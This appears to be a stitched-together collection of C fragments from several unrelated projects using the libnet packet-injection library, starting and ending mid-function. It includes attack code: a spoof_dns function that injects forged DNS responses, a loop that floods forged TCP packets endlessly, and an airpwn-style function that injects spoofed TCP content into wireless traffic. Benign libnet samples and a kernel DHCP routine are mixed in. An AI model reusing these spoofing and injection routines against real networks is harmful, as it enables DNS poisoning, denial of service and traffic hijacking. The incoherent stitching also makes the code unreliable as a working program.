14600, /* window size */
0, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H + payload_s, /* length */
payload, /* payload */
payload_s, /* length of payload */
handle, /* libnet handler */
0 /* protocol tag to modify an existing header, 0 to build a new one */
);
if (tcp_tag == -1) {
printf("libnet_build_tcp failure\n");
return (-3);
};
/* IP */
ip_tag = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_TCP_H + payload_s, /* total length of the IP packet,*/
0, /* tos */
(u_short) libnet_get_prand(LIBNET_PRu16), /* IP identification number */
0, /* fragmentation bits and offset */
(u_int8_t)libnet_get_prand(LIBNET_PR8), /* time to live in the network */
proto, /* upper layer protocol */
0, /* checksum (0 for libnet to autofill) */
src_ip, /* source IPv4 address (little endian) */
dst_ip, /* destination IPv4 address (little endian) */
NULL, /* payload */
0, /* payload length*/
handle, /* Libnet handler */
0 /* protocol tag to modify an existing header, 0 to build a new one */
);
if (ip_tag == -1) {
printf("libnet_build_ipv4 failure\n");
return (-4);
};
/* MAC */
eth_tag = libnet_build_ethernet(
dst_mac, /* destination ethernet address */
src_mac, /* source ethernet address */
ETHERTYPE_IP, /* upper layer protocol type */
NULL, /* payload */
0, /* payload length */
handle, /* Libnet handler*/
0 /* protocol tag to modify an existing header, 0 to build a new one */
);
if (eth_tag == -1) {
printf("libnet_build_ethernet failure\n");
return (-5);
};
for(;;)
{
packet_size = libnet_write(handle); /* packet out */
//printf("%d\n", packet_size);
printf("sending TCP packet!\n");
//usleep(1);
}
libnet_destroy(handle); /* release the handler */
return (0);
}
/* Build the new packet and inject it */
void spoof_dns(char *device)
{
// printf("Common Dude!");
struct in_addr src, dst, spoof; /* For printing addresses */
int inject_size; /* Number of bytes of injected packet */
int packet_size; /* Size of the packet */
int i; /* misc */
u_char *packet; /* Packet to be built */
libnet_t *handler; /* Libnet handler */
libnet_ptag_t dns, tcp, udp, ip; /* Libnet ptags */
char errbuf[LIBNET_ERRBUF_SIZE]; /* Error buffer */
packet_size = spoofpacket.payload_size + LIBNET_IPV4_H + LIBNET_UDP_H + LIBNET_DNS_H;
/* Open a raw socket */
handler = libnet_init(LIBNET_RAW4, device, errbuf);
if (handler == NULL)
{
printf("Error opening a socket: %s\n", errbuf);
exit(1);
}
/* DNS header construction */
dns = 0;
udp = 0;
tcp = 0;
ip = 0;
/*****************************************************/
/******* USE: libnet to construct DNS header here ****/
/*****************************************************/
libnet_build_dnsv4 ( LIBNET_UDP_DNSV4_H,
spoofpacket.dns_id,
0x8180,
1,
1,
0,
0,
spoofpacket.payload, //insert payload
spoofpacket.payload_size, //36 //insert length
handler,
dns );
if (dns == -1) {
printf("Building DNS header failed: %s\n", libnet_geterror(handler));
exit(1);
}
// printf("DST PORT: %d\n", spoofpacket.dst_port);
// printf("SRC PORT: %d\n", spoofpacket.src_port);
//printf("UDP Data: %d\n", spoofpacket.payload_size);
/* UDP header construction */
/*** Use libnet to construct UDP header here **/
libnet_build_udp ( spoofpacket.dst_port,
spoofpacket.src_port,
spoofpacket.payload_size + LIBNET_DNS_H + LIBNET_UDP_H, // 36 + 12 + 8
0, //insert UDP checksum. have to check later
NULL, //insert payload
0, //insert lenghth
handler,
udp );
if (udp ==-1) {
printf("Building UDP header failed: %s\n", libnet_geterror(handler));
exit(1);
}
/* IP header construction */
/*****************************************************/
/******* USE: libnet to construct IP header here ****/
/*****************************************************/
libnet_build_ipv4 ( packet_size, //56 + 20
0,
6888, //libnet_get_prand (LIBNET_PRu16)
0,
127,
IPPROTO_UDP,
0, ////insert IP checksum value. have to check later
spoofpacket.dst_address,
spoofpacket.src_address,
NULL, //insert payload
0, //insert length
handler,
ip );
//Remember, all length can be debatable
if (ip == -1) {
printf("Building IP header failed: %s\n", libnet_geterror(handler));
exit(1);
}
/* Calculate checksum */
/****** USE: libnet function to generate checksum*******/
/*******************************************************/
/* Inject the packet */
/*******************************************************/
inject_size = libnet_write(handler);
//printf("Inject: %d\n", inject_size);
if (inject_size == -1)
{
printf("Write failed: %s\n", libnet_geterror(handler));
}
printf("--- Spoofed DNS Response injected ---\n\n");
/* Destroy the packet */
/*******************************************************/
/**************** USE: libnet_destroy() ****************/
/*******************************************************/
libnet_destroy(handler);
}
int
main(int argc, char *argv[])
{
char c;
u_long src_ip = 0, dst_ip = 0;
u_short type = LIBNET_UDP_DNSV4_H;
libnet_t *l;
libnet_ptag_t ip;
libnet_ptag_t ptag4; /* TCP or UDP ptag */
libnet_ptag_t dns;
char errbuf[LIBNET_ERRBUF_SIZE];
char *query = NULL;
char payload[1024];
u_short payload_s;
printf("libnet 1.1 packet shaping: DNSv4[raw]\n");
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* error buffer */
if (!l)
{
fprintf(stderr, "libnet_init: %s", errbuf);
exit(EXIT_FAILURE);
}
/*
* parse options
*/
while ((c = getopt(argc, argv, "d:s:q:t")) != EOF)
{
switch (c)
{
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 's':
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'q':
query = optarg;
break;
case 't':
type = LIBNET_TCP_DNSV4_H;
break;
default:
exit(EXIT_FAILURE);
}
}
if (!src_ip)
{
src_ip = libnet_get_ipaddr4(l);
}
if (!dst_ip || !query)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
/*
* build dns payload
*/
payload_s = snprintf(payload, sizeof payload, "%c%s%c%c%c%c%c",
(char)(strlen(query)&0xff), query, 0x00, 0x00, 0x01, 0x00, 0x01);
/*
* build packet
*/
dns = libnet_build_dnsv4(
type, /* TCP or UDP */
0x7777, /* id */
0x0100, /* request */
1, /* num_q */
0, /* num_anws_rr */
0, /* num_auth_rr */
0, /* num_addi_rr */
payload,
payload_s,
l,
0
);
if (dns == -1)
{
fprintf(stderr, "Can't build DNS packet: %s\n", libnet_geterror(l));
goto bad;
}
if (type == LIBNET_TCP_DNSV4_H) /* TCP DNS */
{
ptag4 = libnet_build_tcp(
0x6666, /* source port */
53, /* destination port */
0x01010101, /* sequence number */
0x02020202, /* acknowledgement num */
TH_PUSH|TH_ACK, /* control flags */
32767, /* window size */
0, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H + LIBNET_TCP_DNSV4_H + payload_s, /* TCP packet size */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (ptag4 == -1)
{
fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l));
goto bad;
}
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_TCP_H + type + payload_s,/* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (ip == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
exit(EXIT_FAILURE);
}
}
else /* UDP DNS */
{
ptag4 = libnet_build_udp(
0x6666, /* source port */
53, /* destination port */
LIBNET_UDP_H + LIBNET_UDP_DNSV4_H + payload_s, /* packet length */
0, /* checksum */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (ptag4 == -1)
{
fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l));
goto bad;
}
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_UDP_H + type + payload_s,/* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_UDP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (ip == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
exit(EXIT_FAILURE);
}
}
/*
* write to the wire
*/
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte DNS packet; check the wire.\n", c);
}
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
void configure_net_dhcp() {
kprintf("k_network: configure_net_dhcp() - attempting DHCP configuration\n");
kprintf("k_network: configure_net_dhcp() - building DHCP request\n");
EFI_SIMPLE_NETWORK_MODE *m = simple_net->Mode;
int i = 0;
u_char options_req[] = { LIBNET_DHCP_SUBNETMASK,
LIBNET_DHCP_BROADCASTADDR, LIBNET_DHCP_TIMEOFFSET,
LIBNET_DHCP_ROUTER, LIBNET_DHCP_DOMAINNAME,
LIBNET_DHCP_DNS, LIBNET_DHCP_HOSTNAME };
u_char *options;
libnet_t *l;
char* err_buf;
l = libnet_init(LIBNET_NONE,NULL,err_buf);
if(!l) {
kprintf("libnet_init: %s\n", err_buf);
}
kprintf("k_network: configure_net_dhcp() - libnet setup\n");
u_long options_len = 3;
libnet_ptag_t dhcp_packet;
libnet_ptag_t udp_packet;
libnet_ptag_t ip_packet;
options = malloc(3);
options[i++] = LIBNET_DHCP_MESSAGETYPE;
options[i++] = 1;
options[i++] = LIBNET_DHCP_MSGDISCOVER;
u_long orig_len = options_len;
options_len += sizeof(options_req) + 2;
u_char *tmp = malloc(options_len);
memcpy(tmp, options, orig_len);
free(options);
options = tmp;
options[i++] = LIBNET_DHCP_PARAMREQUEST;
options[i++] = sizeof(options_req);
memcpy(options + i, options_req, sizeof(options_req));
i += sizeof(options_req);
orig_len = options_len;
options_len += 1;
tmp = malloc(options_len);
memcpy(tmp, options, orig_len);
free(options);
options = tmp;
options[i++] = LIBNET_DHCP_END;
if (options_len + LIBNET_DHCPV4_H < LIBNET_BOOTP_MIN_LEN)
{
orig_len = options_len;
options_len = LIBNET_BOOTP_MIN_LEN - LIBNET_DHCPV4_H;
tmp = malloc(options_len);
memcpy(tmp, options, orig_len);
free(options);
options = tmp;
memset(options + i, 0, options_len - i);
}
dhcp_packet = libnet_build_dhcpv4(
LIBNET_DHCP_REQUEST, /* opcode */
1, /* hardware type */
6, /* hardware address length */
0, /* hop count */
0xdeadbeef, /* transaction id */
0, /* seconds since bootstrap */
0x8000, /* flags */
0, /* client ip */
0, /* your ip */
0, /* server ip */
0, /* gateway ip */
m->CurrentAddress.Addr, /* client hardware addr */
NULL, /* server host name */
NULL, /* boot file */
options, /* dhcp options in payload */
options_len, /* length of options */
l, /* libnet context */
0); /* libnet ptag */
udp_packet = libnet_build_udp(
68, /* source port */
67, /* destination port */
LIBNET_UDP_H + LIBNET_DHCPV4_H + options_len, /* packet size */
0, /* checksum */
NULL, /* payload */
0, /* payload size */
l, /* libnet context */
0); /* libnet ptag */
ip_packet = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_UDP_H + LIBNET_DHCPV4_H
+ options_len, /* length */
0x10, /* TOS */
0, /* IP ID */
0, /* IP Frag */
16, /* TTL */
IPPROTO_UDP, /* protocol */
0, /* checksum */
0, /* src ip */
0, /* destination ip */
NULL, /* payload */
0, /* payload size */
l, /* libnet context */
0); /* libnet ptag */
uint32_t pack_size=0;
uint8_t *pack;
/* char _tx_buf[4096];
void* buf = (void*)_tx_buf;
memset(buf,0,4096);
// UINTN pack_size = sizeof(struct dhcp_msg);
UINTN pack_size=0;
// EFI_PXE_BASE_CODE_DHCPV4_PACKET *dhcp_req = (EFI_PXE_BASE_CODE_DHCPV4_PACKET*)malloc(sizeof(EFI_PXE_BASE_CODE_DHCPV4_PACKET));
struct dhcp_msg *dhcp_req = (struct dhcp_msg*)(buf +(m->MediaHeaderSize)+ (sizeof(struct iphdr) + sizeof(struct udphdr)));
uint64_t req_id = (uint64_t)rand();
int i=0;
memset((void*)dhcp_req,0,pack_size);
dhcp_req->op = 1; // request
dhcp_req->htype = m->IfType;
dhcp_req->hlen = m->HwAddressSize;
dhcp_req->hops = 0;
dhcp_req->xid = req_id;
dhcp_req->secs = 0;
dhcp_req->flags = 0x8000;
for(i=0; i< m->HwAddressSize; i++) {
dhcp_req->chaddr[i] = m->CurrentAddress.Addr[i];
}
dhcp_req->cookie = 0x63825363;
dhcp_req->options[0] = 53;
dhcp_req->options[1] = 1;
dhcp_req->options[2] = 1;
kprintf("k_network: configure_net_dhcp() ID is %#llx\n",req_id);
struct iphdr *iph = (struct iphdr *)(buf+(m->MediaHeaderSize));
struct udphdr *udph = (struct udphdr *) (buf + sizeof (struct iphdr)+(m->MediaHeaderSize));
memset((void*)iph,0,sizeof(struct iphdr));
// memset((void*)udph,0,sizeof(struct udph));
iph->ihl = 5;
iph->version = 4;
iph->tot_len = htons(sizeof(struct iphdr));
iph->protocol = IPPROTO_UDP;
iph->ttl = 255;
iph->saddr = INADDR_ANY;
iph->daddr = INADDR_ANY;
// iph->check = csum ((unsigned short *) buf, iph->tot_len);
// udph->uh_ulen = sizeof(struct udphdr) + pack_size;
// udph->uh_sum = csum((unsigned short*)(buf - sizeof(struct udphdr)),pack_size+sizeof(struct udphdr));
// udph->uh_sport = 68;
// udph->uh_dport = 68;*/
EFI_MAC_ADDRESS anywhere;
for(i=0; i< m->HwAddressSize; i++) {
anywhere.Addr[i] = 255;
}
kprintf("k_network:configure_net_dhcp() - Transmitting request\n");
UINT16 ether_type = 0x800;
// EFI_STATUS send_s = simple_net->Transmit(simple_net,0,tx_size,buf,NULL,&anywhere,ðer_type);
EFI_STATUS send_s = simple_net->Transmit(simple_net,m->MediaHeaderSize,pack_size,(void*)pack,NULL,&anywhere,ðer_type);
kprintf("k_network:configure_net_dhcp() - Waiting for transmission\n");
void* tx_buf=NULL;
while(tx_buf==NULL && (send_s==0)) {
tx_buf=NULL;
send_s = simple_net->GetStatus(simple_net,0,&tx_buf);
if(send_s != 0) kprintf("!\n");
}
kprintf("k_network:configure_net_dhcp() - Transmitted, tx_buf at %#llx \n",tx_buf);
}
int
main(int argc, char *argv[])
{
int c;
char *cp;
libnet_t *l;
libnet_ptag_t t;
char *payload;
u_short payload_s;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
char errbuf[LIBNET_ERRBUF_SIZE];
printf("libnet 1.1 packet shaping: TCP (over FDDI) [link]\n");
/*
* Initialize the library. Root priviledges are required.
*
* Currently hardcoded for fddi0.
*/
l = libnet_init(
LIBNET_LINK, /* injection type */
"fddi0", /* network interface */
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
src_ip = 0;
dst_ip = 0;
src_prt = 0;
dst_prt = 0;
payload = NULL;
payload_s = 0;
while ((c = getopt(argc, argv, "d:s:p:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then seperate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if (!(cp = strrchr(optarg, '.')))
{
usage(argv[0]);
}
*cp++ = 0;
dst_prt = (u_short)atoi(cp);
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 's':
if (!(cp = strrchr(optarg, '.')))
{
usage(argv[0]);
}
*cp++ = 0;
src_prt = (u_short)atoi(cp);
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'p':
payload = optarg;
payload_s = strlen(payload);
break;
default:
exit(EXIT_FAILURE);
}
}
if (!src_ip || !src_prt || !dst_ip || !dst_prt)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
t = libnet_build_tcp(
src_prt, /* source port */
dst_prt, /* destination port */
0x01010101, /* sequence number */
0x02020202, /* acknowledgement num */
TH_SYN, /* control flags */
32767, /* window size */
0, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H + payload_s, /* TCP packet size */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_TCP_H + payload_s, /* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_fddi(
LIBNET_FDDI_FC_REQD | 0x04, /* Asynch LLC - priority 4 */
fddi_dst, /* fddi destination */
fddi_src, /* fddi source */
LIBNET_SAP_SNAP, /* DSAP -> SNAP encap */
LIBNET_SAP_SNAP, /* SSAP -> SNAP encap */
0x03, /* Unnumbered info/frame */
org_code, /* Organization Code */
FDDI_TYPE_IP, /* protocol type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build fddi header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte TCP packet; check the wire.\n", c);
}
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
void create_tcp_packet(struct tcphdr2 *tcp,struct ip* ip, int size_payload,const u_char* packet){
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_ptag_t tag=0,tag_tcp=0,ipv=0; /* libnet protocol block */
libnet_t * libnet_context;
int set=0;
int port_out,port_in;
char* payload ;
if(!strcmp("192.168.1.3",inet_ntoa(ip->ip_src)))set=1;
else set=2;
if(set==1){
libnet_context = libnet_init(LIBNET_RAW4,"eth0", errbuf);
port_out=check_out(ntohs(tcp->source));
}
else{
libnet_context = libnet_init(LIBNET_RAW4,"eth1", errbuf);
//if(ntohs(tcp->dest)!=9999){exit(0);}
port_in=check_in(ntohs(tcp->dest));
if(!port_in)return;//exit(0);return;}
}
if (libnet_context == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(1);
}
fprintf(stderr, "libnet_init() seccess\n");
payload=(char*) (packet+54);
char* flags=(char*)(tcp+13);
if((tcp->doff)*4 > 20)
{
fprintf(stderr, "(tcp->doff)*4 > 20\n");
if(libnet_build_tcp_options(/*(u_int8_t *)(tcp+20)*/(u_int8_t *)packet+54,(tcp->doff)*4 -20,libnet_context,0)==-1)
{
printf("tcp_option error\n\n");
}
//payload=(char*)( packet+(tcp->doff)*4-20+54);
printf("tcp_option\n");
}
fprintf(stderr, "libnet_init() seccess2\n");
if (size_payload == 0) payload = NULL;
if(set==1){
// port_test=ntohs(tcp->source);
tag_tcp = libnet_build_tcp (
//ntohs(tcp->source), /* src port */
//9999,
port_out,
ntohs(tcp->dest), /* destination port */
ntohl(tcp->seq), /* sequence number */
ntohl(tcp->ack_seq), /* acknowledgement */
tcp->th_flags,
//(*flags), /* control flags */
ntohs(tcp->window), /* window */
0 , /* checksum - 0 = autofill */
ntohs(tcp->urg_ptr), /* urgent */
(tcp->doff)*4+size_payload, /* total tcp size */
payload, /* payload */
size_payload, /* payload length */
libnet_context, /* libnet context */
tag);
/* protocol tag */
}
else{
tag_tcp = libnet_build_tcp (
ntohs(tcp->source), /* src port */
//ntohs(tcp->dest), /* destination port */
port_in,
//port_test,
ntohl(tcp->seq), /* sequence number */
ntohl(tcp->ack_seq), /* acknowledgement */
tcp->th_flags, /* control flags */
ntohs(tcp->window), /* window */
0 , /* checksum - 0 = autofill */
ntohs(tcp->urg_ptr), /* urgent */
(tcp->doff)*4+size_payload, /* total tcp size */
payload, /* payload */
size_payload, /* payload length */
libnet_context, /* libnet context */
tag);
}
if (tag_tcp == -1)
{
fprintf (stderr,
"Unable to build TCP header: %s\n", libnet_geterror (libnet_context));
exit (1);
}
//libnet_do_checksum(&libnet_context,tcp,IPPROTO_TCP,(tcp->doff));
fprintf (stderr,"tcp_build OK\n");
struct in_addr* tmp_src = &ip->ip_src;
struct in_addr* tmp_dst = &ip->ip_dst;
if(set==1){
ipv = libnet_build_ipv4(
ntohs(ip->ip_len), /* length */
(ip->ip_tos), /* TOS */
ntohs(ip->ip_id), /* IP ID */
ntohs(ip->ip_off), /* IP Frag */
(ip->ip_ttl), /* TTL */
(ip->ip_p), /* protocol */
//IPPROTO_TCP,
0, /* checksum */
libnet_name2addr4(libnet_context,"140.114.195.31",LIBNET_DONT_RESOLVE),
*((u_int32_t*)(tmp_dst)), /* destination IP */
//libnet_name2addr4(libnet_context,"192.168.1.3",LIBNET_DONT_RESOLVE),
// *((u_int32_t*)(tmp_src)), /*src IP*/
NULL, /* payload */
0, /* payload size */
libnet_context, /* libnet context */
tag); /* ptag */
}else if(set==2){
ipv = libnet_build_ipv4(
ntohs(ip->ip_len), /* length */
(ip->ip_tos), /* TOS */
ntohs(ip->ip_id), /* IP ID */
ntohs(ip->ip_off), /* IP Frag */
(ip->ip_ttl), /* TTL */
(ip->ip_p), /* protocol */
//IPPROTO_TCP,
0, /* checksum */
// libnet_name2addr4(libnet_context,"192.168.1.0",LIBNET_DONT_RESOLVE),
*((u_int32_t*)(tmp_src)), /*src IP*/
libnet_name2addr4(libnet_context,"192.168.1.3",LIBNET_DONT_RESOLVE),
//*((u_int32_t*)(tmp_dst)), /* destination IP */
NULL, /* payload */
0, /* payload size */
libnet_context, /* libnet context */
tag);
}
else {
printf("error iph\n");exit(0);
}
if (ipv == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(libnet_context));
}
if (set==1) {
//flag为1,带表从内网到外网,目的MAC:gateway 源MAC:localMACw
libnet_build_ethernet(
gatewayMAC, /* ethernet destination */
LOCAL_MAC_OUTTER, /* ethernet source */
ETHERTYPE_IP, /* protocol type */
NULL, /* payload */
0, /* payload size */
libnet_context, /* libnet handle */
0); /* libnet id */
} else {
//flag为0,代表从外网到内网,目的MAC:targetMAC 源MAC:localMACn
libnet_build_ethernet(
targetMAC, /* ethernet destination */
LOCAL_MAC_INNER, /* ethernet source */
ETHERTYPE_IP, /* protocol type */
NULL, /* payload */
0, /* payload size */
libnet_context, /* libnet handle */
0); /* libnet id */
}
if (libnet_write(libnet_context) == -1)
fprintf(stderr, "Write error: %s\n", libnet_geterror(libnet_context));
fprintf(stderr, "Send %u\n",(u_int16_t)tcp->doff);
libnet_clear_packet(libnet_context);
libnet_destroy(libnet_context);
}
/**
* Function to inject TCP packets to the wireless interface. Requires headers
* from a TO_DS packet for use in crafting the FROM_DS response.
*/
void inject_tcp(airpwn_ctx *ctx,
ieee80211_hdr *w_hdr,
struct iphdr *ip_hdr,
struct tcphdr *tcp_hdr,
uint8_t *wepkey,
uint32_t keylen,
char *content,
uint32_t contentlen,
uint8_t tcpflags,
uint32_t *seqnum)
{
// libnet wants the data in host-byte-order
u_int ack = ntohl(tcp_hdr->seq) +
( ntohs(ip_hdr->tot_len) - ip_hdr->ihl * 4 - tcp_hdr->doff * 4 );
ctx->tcp_t = libnet_build_tcp(
ntohs(tcp_hdr->dest), // source port
ntohs(tcp_hdr->source), // dest port
*seqnum, // sequence number
ack, // ack number
tcpflags, // flags
0xffff, // window size
0, // checksum
0, // urg ptr
20 + contentlen, // total length of the TCP packet
(uint8_t*)content, // response
contentlen, // response_length
ctx->lnet, // libnet_t pointer
ctx->tcp_t // ptag
);
if(ctx->tcp_t == -1){
printf("libnet_build_tcp returns error: %s\n", libnet_geterror(ctx->lnet));
return;
}
ctx->ip_t = libnet_build_ipv4(
40 + contentlen, // length
0, // TOS bits
1, // IPID (need to calculate)
0, // fragmentation
0xff, // TTL
6, // protocol
0, // checksum
ip_hdr->daddr, // source address
ip_hdr->saddr, // dest address
NULL, // response
0, // response length
ctx->lnet, // libnet_t pointer
ctx->ip_t // ptag
);
if(ctx->ip_t == -1){
printf("libnet_build_ipv4 returns error: %s\n", libnet_geterror(ctx->lnet));
return;
}
// copy the libnet packets to to a buffer to send raw..
unsigned char packet_buff[0x10000];
memcpy(packet_buff, w_hdr, IEEE80211_HDR_LEN);
ieee80211_hdr *n_w_hdr = (ieee80211_hdr *)packet_buff;
// set the FROM_DS flag and swap MAC addresses
n_w_hdr->flags = IEEE80211_FROM_DS;
if(wepkey)
n_w_hdr->flags |= IEEE80211_WEP_FLAG;
n_w_hdr->llc.type = LLC_TYPE_IP;
uint8_t tmp_addr[6];
memcpy(tmp_addr, n_w_hdr->addr1, 6);
memcpy(n_w_hdr->addr1, n_w_hdr->addr2, 6);
memcpy(n_w_hdr->addr2, tmp_addr, 6);
u_int32_t packet_len;
u_int8_t *lnet_packet_buf;
// cull_packet will dump the packet (with correct checksums) into a
// buffer for us to send via the raw socket
if(libnet_adv_cull_packet(ctx->lnet, &lnet_packet_buf, &packet_len) == -1){
printf("libnet_adv_cull_packet returns error: %s\n",
libnet_geterror(ctx->lnet));
return;
}
memcpy(packet_buff + IEEE80211_HDR_LEN, lnet_packet_buf, packet_len);
libnet_adv_free_packet(ctx->lnet, lnet_packet_buf);
// total packet length
int len = IEEE80211_HDR_LEN + 40 + contentlen;
if(wepkey){
uint8_t tmpbuf[0x10000];
/* encryption starts after the 802.11 header, but the LLC header
* gets encrypted. */
memcpy(tmpbuf, packet_buff+IEEE80211_HDR_LEN_NO_LLC,
len-IEEE80211_HDR_LEN_NO_LLC);
len = wep_encrypt(tmpbuf, packet_buff+IEEE80211_HDR_LEN_NO_LLC,
len-IEEE80211_HDR_LEN_NO_LLC, wepkey, keylen);
if(len <= 0){
fprintf(stderr, "Error performing WEP encryption!\n");
return;
} else
len += IEEE80211_HDR_LEN_NO_LLC;
}
/* Establish lorcon packet transmission structure */
ctx->in_packet.packet = packet_buff;
ctx->in_packet.plen = len;
/* Send the packet */
if (tx80211_txpacket(&ctx->inject_tx, &ctx->in_packet) < 0) {
fprintf(stderr, "Unable to transmit packet.");
perror("tx80211_txpacket");
return;
}
*seqnum += contentlen; //advance the sequence number
printlog(ctx, 2, "wrote %d bytes to the wire(less)\n", len);
}
// Sends an empty TCP segment with the specified parameters
int sendEmptyTCPSegment( libnet_t *libnet_c,
TcpSession *sess,
u_int32_t seq,
u_int32_t ack,
u_int8_t control,
NM_PacketDir dir )
{
libnet_ptag_t tcp, ip, ethernet;
tcp = ip = ethernet = 0;
tcp = libnet_build_tcp(
( dir == ePacketDirFromClient ) ? sess->clientStream.port : ( config.cap[capindex]->dsslport ? config.cap[capindex]->dsslport: sess->serverStream.port ), /* source port */
( dir == ePacketDirFromClient ) ? ( config.cap[capindex]->dsslport ? config.cap[capindex]->dsslport: sess->serverStream.port ) : sess->clientStream.port, /* destination port */
seq, /* sequence number */
ack, /* acknowledgement num */
control, /* control flags */
32767, /* window size */
0, /* checksum */
10, /* urgent pointer */
LIBNET_TCP_H, /* TCP packet size */
NULL, /* payload */
0, /* payload size */
libnet_c, /* libnet handle */
0); /* libnet id */
if (tcp == -1)
{
if (config.daemon)
syslog(LOG_ERR, "Can't build TCP header: %s", libnet_geterror(libnet_c));
else
fprintf(stderr, "Can't build TCP header: %s.\n", libnet_geterror(libnet_c));
return( -1 );
}
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_TCP_H, /* length */
0, /* TOS */
54609, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
( dir == ePacketDirFromClient ) ? sess->clientStream.ip_addr : sess->serverStream.ip_addr, /* source IP */
( dir == ePacketDirFromClient ) ? sess->serverStream.ip_addr : sess->clientStream.ip_addr, /* destination IP */
NULL, /* payload */
0, /* payload size */
libnet_c, /* libnet handle */
0); /* libnet id */
if (ip == -1)
{
if (config.daemon)
syslog(LOG_ERR, "Can't build IP header: %s", libnet_geterror(libnet_c));
else
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(libnet_c));
return( -1 );
}
ethernet = libnet_build_ethernet(
( dir == ePacketDirFromClient ) ? config.cap[capindex]->dst_interface_mac : config.cap[capindex]->src_interface_mac, /* ethernet dest */
( dir == ePacketDirFromClient ) ? config.cap[capindex]->src_interface_mac : config.cap[capindex]->dst_interface_mac, /* ethernet source */
ETHERTYPE_IP, /* protocol type */
NULL, /* payload */
0, /* payload size */
libnet_c, /* libnet handle */
0); /* libnet id */
if (ethernet == -1)
{
if (config.daemon)
syslog(LOG_ERR, "Can't build ethernet header: %s", libnet_geterror(libnet_c));
else
fprintf(stderr, "Can't build ethernet header: %s.\n", libnet_geterror(libnet_c));
return( -1 );
}
if (libnet_write(libnet_c) == -1)
{
if (config.daemon)
syslog(LOG_ERR, "write error: %s", libnet_geterror(libnet_c));
else
fprintf(stderr, "Write error: %s.\n", libnet_geterror(libnet_c));
return( -1 );
}
libnet_clear_packet(libnet_c);
return( 1 );
}
int
main(int argc, char **argv)
{
int c;
libnet_t *l;
libnet_ptag_t t;
u_long src_ip, dst_ip;
char errbuf[LIBNET_ERRBUF_SIZE];
printf("libnet 1.1 packet shaping: ICMP timestamp[raw]\n");
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* errbuf */
if (l == NULL)
{
